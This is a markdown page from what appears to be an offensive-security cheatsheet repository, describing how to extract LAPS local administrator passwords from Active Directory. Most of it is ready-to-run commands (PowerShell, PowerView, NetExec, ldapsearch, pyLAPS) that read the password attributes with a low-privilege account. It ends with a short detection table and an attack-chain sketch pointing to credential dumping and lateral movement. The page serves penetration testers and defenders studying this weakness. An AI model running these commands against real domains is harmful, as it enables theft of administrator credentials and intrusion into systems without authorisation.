daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-72-laps-password-extraction.md (4048B)


      1 ---
      2 title: "Attack #72 โ€” LAPS Password Extraction"
      3 description: "LAPS (Local Administrator Password Solution) stores unique, randomized local admin passwords in Active Directory attributes (ms-Mcs-AdmPwd for LAPS v1โ€ฆ"
      4 category: active-directory
      5 subcategory: "Advanced & Post-Exploitation"
      6 tags: ["active-directory"]
      7 tools: ["NetExec", "ldapsearch", "PowerShell"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-Ten/๐Ÿ”ท Attack #72 โ€” LAPS Password Extraction.md"
     11 ---
     12 # ๐Ÿ”ท Attack #72 โ€” LAPS Password Extraction
     13 
     14 ***
     15 
     16 ## ๐Ÿ“– How It Works
     17 
     18 LAPS (Local Administrator Password Solution) stores unique, randomized local admin passwords in Active Directory attributes (`ms-Mcs-AdmPwd` for LAPS v1, `msLAPS-Password` / `msLAPS-EncryptedPassword` for LAPS v2) on computer objects. If a user can read these attributes (via ACL misconfiguration or group membership), they can extract the cleartext local admin password for any managed computer.
     19 
     20 ***
     21 
     22 ## โš™๏ธ Prerequisites
     23 
     24 | Requirement | Detail |
     25 |---|---|
     26 | **Read access to LAPS attributes** | Must have `Read ms-Mcs-AdmPwd` or `Read msLAPS-Password` |
     27 | **Domain user with delegated LAPS read rights** | Often helpdesk, server admins |
     28 
     29 ***
     30 
     31 ## ๐Ÿ’ป Full Commands
     32 
     33 ```powershell
     34 # โ”€โ”€ Check who can read LAPS passwords โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     35 Find-AdmPwdExtendedRights -Identity "OU=Servers,DC=corp,DC=local"
     36 
     37 # โ”€โ”€ Read LAPS password (LAPS v1) โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     38 Get-ADComputer TARGET -Properties ms-Mcs-AdmPwd | Select Name,ms-Mcs-AdmPwd
     39 
     40 # โ”€โ”€ LAPS v2 โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     41 Get-LapsADPassword -Identity TARGET -AsPlainText
     42 
     43 # โ”€โ”€ PowerView โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     44 Get-DomainComputer TARGET -Properties ms-Mcs-AdmPwd,ms-Mcs-AdmPwdExpirationTime
     45 ```
     46 
     47 ```bash
     48 # โ”€โ”€ NetExec โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     49 nxc ldap DC01.corp.local -u low_user -p 'Password1' --module laps
     50 
     51 # Or smb:
     52 nxc smb DC01.corp.local -u low_user -p 'Password1' --laps
     53 
     54 # โ”€โ”€ ldapsearch โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     55 ldapsearch -x -H ldap://DC01.corp.local -D "low_user@corp.local" -w 'Password1' \
     56   -b "DC=corp,DC=local" "(ms-Mcs-AdmPwd=*)" ms-Mcs-AdmPwd
     57 
     58 # โ”€โ”€ pyLAPS โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
     59 python3 pyLAPS.py --action get -d corp.local -u low_user -p 'Password1' --dc-ip 10.10.10.10
     60 ```
     61 
     62 ***
     63 
     64 ## ๐Ÿ›ก๏ธ Detection โ€” Event IDs
     65 
     66 | Event ID | Source | What to Look For |
     67 |---|---|---|
     68 | **4662** | Security Log (DC) | Read access to ms-Mcs-AdmPwd attribute |
     69 | **Audit** | AD DS | Track who queries LAPS password attributes |
     70 
     71 ***
     72 
     73 ## ๐Ÿ”— Attack Chain Context
     74 
     75 ```
     76 [LAPS] โ”€โ”€โ†’ Read local admin passwords from AD attributes
     77          โ”‚
     78          โ”œโ”€โ”€โ†’ ๐Ÿ”‘ Each computer has unique local admin password
     79          โ”œโ”€โ”€โ†’ ๐Ÿ”— Password โ†’ local admin โ†’ credential dumping โ†’ lateral movement
     80          โ””โ”€โ”€โ†’ ๐Ÿ’€ Defeated by: restrict LAPS read delegation, audit access
     81 ```
     82 
     83 ***
     84 
     85 > โœ… **Attack #72 โ€” LAPS Password Extraction complete.**